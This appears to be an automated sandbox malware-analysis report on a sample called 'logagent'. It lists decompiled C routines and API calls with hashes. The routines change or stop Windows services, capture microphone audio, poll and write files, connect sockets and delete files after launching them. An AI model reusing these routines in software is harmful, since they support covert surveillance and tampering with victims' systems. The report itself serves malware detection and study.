                                    • Part of subcall function 1054D021: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 1054D03B
                                    • Part of subcall function 1054D021: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,80000001,10544BEE,0041BA38), ref: 1054D057
                                    • Part of subcall function 1054D021: RegCloseKey.ADVAPI32(?), ref: 1054D062
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 1054A396
                                  • _wgetenv.MSVCRT ref: 1054A3AA
                                  • ShellExecuteW.SHELL32(00000000,0041578C,00000000), ref: 1054A4C0
                                  • exit.MSVCRT ref: 1054A4CC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseExecuteFileModuleNameObjectOpenProcessQueryShellSingleTerminateValueWait_wgetenvexit
                                  • String ID:
                                  • API String ID: 1669883435-0
                                  • Opcode ID: 36730b68c876fba5bf6b311daab70d26e16060d5c7b1821c68368bdd8b92c69d
                                  • Instruction ID: 67d6ef67ea974b3a23237c924f8bb1ae1cae459f6018489c3f142a7e377e42cb
                                  • Opcode Fuzzy Hash: 36730b68c876fba5bf6b311daab70d26e16060d5c7b1821c68368bdd8b92c69d
                                  • Instruction Fuzzy Hash: 27412D7280050DEBDB04EBE0ED4DDEE7B7CEF88245B604065F516E3090EB756A09CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _wgetenv.MSVCRT ref: 105502CD
                                  • ShellExecuteW.SHELL32(00000000,0041578C,00416984,00000000,?,00000000), ref: 10550321
                                    • Part of subcall function 1055476E: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,105435A8,00000000), ref: 10554788
                                  • Sleep.KERNEL32(00000064,00000000,00000000), ref: 10550356
                                  • DeleteFileW.KERNEL32(00000000), ref: 1055038D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateDeleteExecuteShellSleep_wgetenv
                                  • String ID:
                                  • API String ID: 1374653677-0
                                  • Opcode ID: 8343fac9947079cf2d62a9b7fe42f8f7cebfed9dfd8b971e217756b2f2b08bd1
                                  • Instruction ID: 3daf5320e360039866d27c13fbd300ce230a7e00d4335818beeaf2a9b8c70b2d
                                  • Opcode Fuzzy Hash: 8343fac9947079cf2d62a9b7fe42f8f7cebfed9dfd8b971e217756b2f2b08bd1
                                  • Instruction Fuzzy Hash: 2141557280050DEFCB04EBE0ED9E9EEBB7CEF54245B604026F912E7091EB716A09CB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 50%
                                  			E10553C99(void* __ecx, intOrPtr __edx, void* __eflags) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				char _v44;
                                  				char _v52;
                                  				char _v60;
                                  				char _v68;
                                  				char _v76;
                                  				char _v84;
                                  				void* _t39;
                                  				void* _t41;
                                  				void* _t45;
                                  				void* _t50;
                                  				void* _t54;
                                  				intOrPtr _t56;
                                  				intOrPtr* _t59;
                                  
                                  				_t56 = __edx;
                                  				_t54 = __ecx;
                                  				// Resolves a function by name; neither the module name at 0x4165f4 nor the
                                  				// function name at 0x416c3c is resolved in this dump.
                                  				_t59 = GetProcAddress(GetModuleHandleA(0x4165f4), 0x416c3c);
                                  				// Two samples of three out-values, taken 1 s (0x3e8 ms) apart.
                                  				 *_t59( &_v44,  &_v60,  &_v76);
                                  				Sleep(0x3e8);
                                  				 *_t59( &_v52,  &_v68,  &_v84);
                                  				// E10553D7D widens each sampled value to 64 bits (edx:eax); the sbb/adc
                                  				// lines below are the decompiler's rendering of the 64-bit subtractions
                                  				// between the two samples.
                                  				_v28 = E10553D7D(_t54,  &_v44);
                                  				_v24 = _t56;
                                  				_v20 = E10553D7D(_t54,  &_v52);
                                  				_v16 = _t56;
                                  				_t39 = E10553D7D(_t54,  &_v60);
                                  				_v32 = _t56;
                                  				_t41 = E10553D7D(_t54,  &_v68);
                                  				_v12 = E10553D7D(_t54,  &_v76);
                                  				asm("sbb edi, [ebp-0x1c]");
                                  				_v8 = _t56;
                                  				_v32 = _t56;
                                  				_t45 = E10553D7D(_t54,  &_v84);
                                  				asm("sbb edi, [ebp-0x4]");
                                  				asm("sbb ecx, [ebp-0xc]");
                                  				asm("adc ecx, [ebp-0x1c]");
                                  				asm("adc ecx, [ebp-0x14]");
                                  				// 64-bit division of the combined delta by 100 (divisor 0x64:0); this
                                  				// matches the __aulldiv reference at 10553D73 in the API list below.
                                  				_t50 = E105558FF(_t45 - _v12 - _v20 + _t41 - _t39 + _v28, _t56, 0x64, 0);
                                  				asm("adc edi, [ebp-0x1c]");
                                  				return E1055588F(_t50, _t56, _t45 - _v12 + _t41 - _t39, _t56);
                                  			}

                                  APIs
                                  • GetModuleHandleA.KERNEL32(004165F4,00416C3C,?,0041B320), ref: 10553CAC
                                  • GetProcAddress.KERNEL32(00000000), ref: 10553CB3
                                  • Sleep.KERNEL32(000003E8,?,0041B320), ref: 10553CCE
                                  • __aulldiv.LIBCMT ref: 10553D73
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProcSleep__aulldiv
                                  • String ID:
                                  • API String ID: 482274533-0
                                  • Opcode ID: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                  • Instruction ID: e3a3a8c3d7a79754f9aa8e0ce1dde822a5cb1b5f7c87105496dd61f204d78da6
                                  • Opcode Fuzzy Hash: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                  • Instruction Fuzzy Hash: 1A31DF76D0021DABCB01DBE4CC89DEFBFBCEF88650F144526E515F7241D674A6498BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • EnumDisplayMonitors.USER32(00000000,00000000,0041010A,00000000), ref: 105519CC
                                  • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 105519DC
                                  • EnumDisplayDevicesW.USER32(?,00000000,?,00000000), ref: 10551A07
                                  • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 10551A6E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DisplayEnum$Devices$Monitors
                                  • String ID:
                                  • API String ID: 1432082543-0
                                  • Opcode ID: 2a8bf80244e73db8b672108339938ec36978e45915be8a8cfec9bbfac7a636db
                                  • Instruction ID: 3b8c43d80bf28f61e6645a612481e6431e14e047a93d0368fcca146c63d5e8aa
                                  • Opcode Fuzzy Hash: 2a8bf80244e73db8b672108339938ec36978e45915be8a8cfec9bbfac7a636db
                                  • Instruction Fuzzy Hash: 4921D87290111EABDB519BA1DC88DEFBF7CEF09355F004166F50AE2050EB749689CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 17%
                                  			E105532B6(void* _a4, signed char _a20) {
                                  				signed int _t10;
                                  				int _t11;
                                  				void* _t16;
                                  				short* _t19;
                                  				int _t21;
                                  				void* _t23;
                                  				void* _t24;
                                  				intOrPtr* _t25;
                                  
                                  				_t19 = 0;
                                  				// Opens the SCM with SC_MANAGER_CREATE_SERVICE (0x2) and the target service,
                                  				// whose name comes from the unresolved call through 0x41532c, with
                                  				// SERVICE_CHANGE_CONFIG (0x2).
                                  				_t24 = OpenSCManagerW(0, 0, 2);
                                  				_t23 = OpenServiceW(_t24,  *0x41532c(), 2);
                                  				if(_t23 != 0) {
                                  					// _t21 starts as 0xffffffff (SERVICE_NO_CHANGE). _a20 selects the new
                                  					// start type: 0 -> 4 SERVICE_DISABLED, 1 -> 2 SERVICE_AUTO_START,
                                  					// 2 -> 3 SERVICE_DEMAND_START; any other value leaves it unchanged.
                                  					_t21 =  &_a4 | 0xffffffff;
                                  					_t10 = _a20 & 0x000000ff;
                                  					if(_t10 == 0) {
                                  						_push(4);
                                  						goto L8;
                                  					} else {
                                  						_t16 = _t10 - 1;
                                  						if(_t16 == 0) {
                                  							_push(2);
                                  							goto L8;
                                  						} else {
                                  							if(_t16 == 1) {
                                  								_push(3);
                                  								L8:
                                  								_pop(_t21);
                                  							}
                                  						}
                                  					}
                                  					// Service type and error control are passed as SERVICE_NO_CHANGE
                                  					// (0xffffffff) and the remaining seven parameters as NULL, so only the
                                  					// start type is rewritten.
                                  					_t11 = ChangeServiceConfigW(_t23, 0xffffffff, _t21, 0xffffffff, _t19, _t19, _t19, _t19, _t19, _t19, _t19);
                                  					// 0x415068 is an import slot the decompiler did not resolve; it is called
                                  					// once per handle. The return value is the ChangeServiceConfigW success flag.
                                  					_t25 =  *0x415068;
                                  					_t19 = _t19 & 0xffffff00 | _t11 != 0x00000000;
                                  					 *_t25(_t24);
                                  					 *_t25(_t23);
                                  				} else {
                                  					CloseServiceHandle(_t24);
                                  				}
                                  				// Second unresolved import call before returning.
                                  				 *0x415350();
                                  				return _t19;
                                  			}

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,0041B310,?,?,10552968), ref: 105532C2
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,10552968), ref: 105532D7
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,10552968), ref: 105532E4
                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,10552968), ref: 10553315
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$Open$ChangeCloseConfigHandleManager
                                  • String ID:
                                  • API String ID: 110783151-0
                                  • Opcode ID: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                  • Instruction ID: 6da5318f99382357567d5d32902a6194b09d4948e2004b57c9f681269b631431
                                  • Opcode Fuzzy Hash: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                  • Instruction Fuzzy Hash: B901B171104529BBE7001BB4EC4EEFB3F5CEB453B0F528626F529921D1CE609D49C5A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E10546EC1(void* __ecx) {
                                  				int _t9;
                                  				long _t14;
                                  				void* _t23;
                                  				void* _t24;
                                  				void* _t30;
                                  
                                  				// Only runs when the 64-bit size threshold stored at 0x41b988 (low dword)
                                  				// and 0x41b98c (high dword) is non-zero.
                                  				_t9 =  *0x41b988 |  *0x41b98c;
                                  				_t24 = __ecx;
                                  				if(_t9 != 0) {
                                  					 *((char*)(__ecx + 0x30)) = 0;
                                  					do {
                                  						// Opens the file named by the unresolved call through 0x41532c for
                                  						// GENERIC_READ (0x80000000), share read/write/delete (7), OPEN_EXISTING (3).
                                  						_t9 = CreateFileW( *0x41532c(), 0x80000000, 7, 0, 3, 0x80, 0);
                                  						_t23 = _t9;
                                  						if(_t23 == 0xffffffff) {
                                  							// Open failed: clear the loop flag.
                                  							 *((char*)(_t24 + 0x30)) = 0;
                                  						} else {
                                  							_t14 = GetFileSize(_t23, 0);
                                  							// Decompiler rendering of a 64-bit compare of (0:size) against the
                                  							// threshold; true once the file has reached it.
                                  							_t30 = 0 -  *0x41b98c;
                                  							if(_t30 >= 0 && (_t30 > 0 || _t14 >=  *0x41b988)) {
                                  								// Threshold reached: set the loop flag, call E105476DF if the field at
                                  								// +0x3c is set, then wait 10 s (0x2710 ms) before checking again.
                                  								 *((char*)(_t24 + 0x30)) = 1;
                                  								if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
                                  									E105476DF(_t24);
                                  								}
                                  								Sleep(0x2710);
                                  							}
                                  							_t9 = CloseHandle(_t23);
                                  						}
                                  						// As decompiled, the flag is cleared only by a failed open, so the loop
                                  						// ends when the file cannot be opened or when the first check is below
                                  						// the threshold.
                                  					} while ( *((char*)(_t24 + 0x30)) == 1);
                                  					// If +0x3c is clear and the configuration byte at 0x41b154 is '1' (0x31),
                                  					// call the unresolved import at 0x415298 and then E10546B0F.
                                  					if( *((intOrPtr*)(_t24 + 0x3c)) == 0 &&  *0x41b154 == 0x31) {
                                  						 *0x415298();
                                  						return E10546B0F(_t24, _t24 + 0x54);
                                  					}
                                  				}
                                  				return _t9;
                                  			}

                                  APIs
                                  • CreateFileW.KERNEL32(00000000), ref: 10546EF8
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 10546F07
                                  • Sleep.KERNEL32(00002710), ref: 10546F36
                                  • CloseHandle.KERNEL32(00000000), ref: 10546F3D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSizeSleep
                                  • String ID:
                                  • API String ID: 1958988193-0
                                  • Opcode ID: 1c13c5a467e04571e64093ad109626eed774499539b51b73ca94ee26c3b54795
                                  • Instruction ID: bdd24677f851696f1759cae2d614dd93d5401da7db0ed02d85374aab91c86406
                                  • Opcode Fuzzy Hash: 1c13c5a467e04571e64093ad109626eed774499539b51b73ca94ee26c3b54795
                                  • Instruction Fuzzy Hash: 05117D70690A40FFD7515374B898BDA7FA8EB49340F10842DF5C2C3594EBA06848CB37
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00412D56(void* __ecx, void* _a4, long _a8, long _a12, intOrPtr _a16) {
                                  				long _v8;
                                  				long _v12;
                                  				intOrPtr _t14;
                                  				struct _OVERLAPPED* _t19;
                                  				long _t22;
                                  				struct _OVERLAPPED* _t24;
                                  				void* _t28;
                                  
                                  				// _a16 selects the write mode: 0 = overwrite (GENERIC_WRITE, CREATE_ALWAYS),
                                  				// 1 = append (FILE_APPEND_DATA, OPEN_ALWAYS, then seek to FILE_END). For any
                                  				// other value _v12 and _v8 are left uninitialised in the code as decompiled.
                                  				_t24 = 0;
                                  				_t14 = _a16;
                                  				if(_t14 == 0) {
                                  					_v12 = 0x40000000;   // GENERIC_WRITE
                                  					_v8 = 2;             // CREATE_ALWAYS
                                  				} else {
                                  					if(_t14 == 1) {
                                  						_t22 = 4;            // FILE_APPEND_DATA and OPEN_ALWAYS are both 4
                                  						_v12 = _t22;
                                  						_v8 = _t22;
                                  					}
                                  				}
                                  				// _a12 is the path; no sharing, FILE_ATTRIBUTE_NORMAL (0x80), no template.
                                  				_t28 = CreateFileW(_a12, _v12, _t24, _t24, _v8, 0x80, _t24);
                                  				if(_t28 != 0xffffffff) {
                                  					// In append mode seek to the end of file (FILE_END = 2) before writing.
                                  					if(_a16 != 1 || SetFilePointer(_t28, _t24, _t24, 2) != 0xffffffff) {
                                  						// Writes _a8 bytes from _a4; the _a12 slot is reused for the bytes-written count.
                                  						if(WriteFile(_t28, _a4, _a8,  &_a12, _t24) != 0) {
                                  							_t24 = 1;
                                  						}
                                  					}
                                  					CloseHandle(_t28);
                                  					_t19 = _t24;
                                  				} else {
                                  					_t19 = 0;
                                  				}
                                  				// 1 on a successful write, otherwise 0.
                                  				return _t19;
                                  			}

                                  APIs
                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00412DAF
                                  • WriteFile.KERNEL32(00000000,40000000,?,?,00000000), ref: 00412DC6
                                  • CloseHandle.KERNEL32(00000000), ref: 00412DD3
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandlePointerWrite
                                  • String ID:
                                  • API String ID: 3604237281-0
                                  • Opcode ID: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                  • Instruction ID: ca773920b5f39e1e62b037f934487c6bab51a0d9f38e2d78726aa57b3ce32958
                                  • Opcode Fuzzy Hash: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                  • Instruction Fuzzy Hash: 26118E71500508BFDF118F94ED88FEF7B6CEB05368F108222F911D6190D2B54EA09768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0040B615(void* __ecx, intOrPtr _a4, void* _a8, short* _a12, char _a15) {
                                  				int _v8;
                                  				int _v12;
                                  				char* _t31;
                                  				signed int _t36;
                                  				signed int _t37;
                                  				void* _t46;
                                  
                                  				_v8 = 0;
                                  				_t31 = 0x415664;
                                  				if(RegQueryValueExW(_a8, _a12, 0,  &_v12, 0,  &_v8) == 0 && _v8 > 0) {
                                  					_t31 = malloc(_v8);
                                  					_t36 = _v8;
                                  					_t46 = _t31;
                                  					_t37 = _t36 >> 2;
                                  					memset(_t46 + _t37, memset(_t46, 0, _t37 << 2), (_t36 & 0x00000003) << 0);
                                  					RegQueryValueExW(_a8, _a12, 0,  &_v12, _t31,  &_v8);
                                  				}
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t31,  &_a15);
                                  				return _a4;
                                  			}


                                  APIs
                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B63D
                                  • malloc.MSVCRT ref: 0040B64B
                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B67A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415664,?), ref: 0040B684
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: QueryV?$allocator@Value$??0?$basic_string@G@1@@G@2@@std@@G@std@@U?$char_traits@malloc
                                  • String ID:
                                  • API String ID: 3506253819-0
                                  • Opcode ID: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                  • Instruction ID: 6657ce7e0b4af722a3644f787a918a8cc9d20f3304ca96b666d2b0068cb46159
                                  • Opcode Fuzzy Hash: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                  • Instruction Fuzzy Hash: 3E11097260010DFFDB05DF95DD80DEFBBBDEB88250B10406ABA05D6250D7719E149BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004028DC
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402915
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402928
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040295E,00000001,00000073), ref: 00402953
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@$??1?$basic_string@??4?$basic_string@V01@connectsocket
                                  • String ID:
                                  • API String ID: 182292213-0
                                  • Opcode ID: e8679a6b84cd13b518d2f85527ac5e7d509b52d12921196b337c3ffbd5f7c91e
                                  • Instruction ID: 3575325012e9a6a69ab12c81105f5cb7c7dcd4fb264b21d23710b3ab9203063c
                                  • Opcode Fuzzy Hash: e8679a6b84cd13b518d2f85527ac5e7d509b52d12921196b337c3ffbd5f7c91e
                                  • Instruction Fuzzy Hash: 0301B97170030867DB00BB76DE4D6EE3A5DDBC5350F40803ABE169B2D1CBB9894483D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00401181(void* __eflags, signed int _a4) {
                                  				intOrPtr _t16;
                                  				intOrPtr _t17;
                                  				intOrPtr _t19;
                                  				intOrPtr _t22;
                                  				intOrPtr _t28;
                                  				intOrPtr _t29;
                                  				intOrPtr _t30;
                                  				intOrPtr _t31;
                                  				intOrPtr _t32;
                                  				intOrPtr _t33;
                                  				signed int _t36;
                                  
                                  				_t38 = __eflags;
                                  				E0040180C(0x41b200, __eflags, _a4);
                                  				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d4);
                                  				_t36 = _a4 << 5;
                                  				_t16 = E0040180C(0x41b200, _t38, _a4);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t28 =  *0x41b1dc; // 0x31f2a00
                                  				 *((intOrPtr*)(_t36 + _t28)) = _t16;
                                  				_t17 =  *0x41b1dc; // 0x31f2a00
                                  				_t29 =  *0x41b1d4; // 0x0
                                  				 *((intOrPtr*)(_t36 + _t17 + 4)) = _t29;
                                  				_t30 =  *0x41b1dc; // 0x31f2a00
                                  				 *((intOrPtr*)(_t36 + _t30 + 8)) = 0;
                                  				_t31 =  *0x41b1dc; // 0x31f2a00
                                  				 *((intOrPtr*)(_t36 + _t31 + 0xc)) = 0;
                                  				_t32 =  *0x41b1dc; // 0x31f2a00
                                  				 *((intOrPtr*)(_t36 + _t32 + 0x10)) = 0;
                                  				_t33 =  *0x41b1dc; // 0x31f2a00
                                  				 *((intOrPtr*)(_t36 + _t33 + 0x14)) = 0;
                                  				_t19 =  *0x41b1dc; // 0x31f2a00
                                  				waveInPrepareHeader( *0x41b198, _t19 + _t36, 0x20);
                                  				_t22 =  *0x41b1dc; // 0x31f2a00
                                  				return waveInAddBuffer( *0x41b198, _t36 + _t22, 0x20);
                                  			}


                                  APIs
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,?,?,0040116A,00000000), ref: 0040119D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,0040116A,00000000), ref: 004011B5
                                  • waveInPrepareHeader.WINMM(031F2A00,00000020,?,?,0040116A,00000000), ref: 0040120D
                                  • waveInAddBuffer.WINMM(?,00000020,?,?,0040116A,00000000), ref: 00401223
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                                  • String ID:
                                  • API String ID: 1952094867-0
                                  • Opcode ID: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                  • Instruction ID: 8f998c45a3acb3b0b10d37a494ac82bd1c86fe74dd73c150e7a1b96005ae6754
                                  • Opcode Fuzzy Hash: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                  • Instruction Fuzzy Hash: 83111835600644FFCB159F65EC689E67BE6EB89394702C83DED0A87365DB31A801CBD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E1055476E(long _a4, void* _a8) {
                                  				struct _OVERLAPPED* _t15;
                                  				void* _t18;
                                  				long _t19;
                                  				void* _t21;
                                  
                                  				_t15 = 0;
                                  				_t21 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
                                  				if(_t21 != 0xffffffff) {
                                  					_t19 = GetFileSize(_t21, 0);
                                  					 *0x41527c(_t19, 0, _t18);
                                  					_a4 = 0;
                                  					if(ReadFile(_t21,  *0x415344(), _t19,  &_a4, 0) != 0) {
                                  						_t15 = 1;
                                  					}
                                  					CloseHandle(_t21);
                                  					return _t15;
                                  				}
                                  				return 0;
                                  			}


                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,105435A8,00000000), ref: 10554788
                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,105435A8,00000000), ref: 1055479C
                                  • ReadFile.KERNEL32(00000000,00000000,?,?,?,105435A8,00000000), ref: 105547C3
                                  • CloseHandle.KERNEL32(00000000,?,?,105435A8,00000000), ref: 105547D1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
• Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleReadSize
                                  • String ID:
                                  • API String ID: 3919263394-0
                                  • Opcode ID: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                  • Instruction ID: 0afa6314b812f41c72e99e6e8686eca4f1d8cfa4813b39caf91b2e04ad1b8554
                                  • Opcode Fuzzy Hash: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                  • Instruction Fuzzy Hash: 4DF08175241518BFE7125F60EC88FEF7F6CEB866A8F108126FD1596290CB704E058AA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E105530EF(void* _a4) {
                                  				struct _SERVICE_STATUS _v32;
                                  				int _t10;
                                  				signed int _t16;
                                  				void* _t19;
                                  				void* _t20;
                                  				intOrPtr* _t21;
                                  
                                  				_t16 = 0;
                                  				_t20 = OpenSCManagerW(0, 0, 0x20);
                                  				_t19 = OpenServiceW(_t20,  *0x41532c(), 0x20);
                                  				if(_t19 != 0) {
                                  					_t10 = ControlService(_t19, 1,  &_v32);
                                  					_t21 =  *0x415068;
                                  					_t16 = 0 | _t10 != 0x00000000;
                                  					 *_t21(_t20);
                                  					 *_t21(_t19);
                                  				} else {
                                  					CloseServiceHandle(_t20);
                                  				}
                                  				 *0x415350();
                                  				return _t16;
                                  			}


                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,0041B310,?,?,?,?,?,?,?,10552C0F), ref: 105530FE
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,10552C0F), ref: 10553113
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10552C0F), ref: 10553120
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,10552C0F), ref: 1055312F
                                  Memory Dump Source
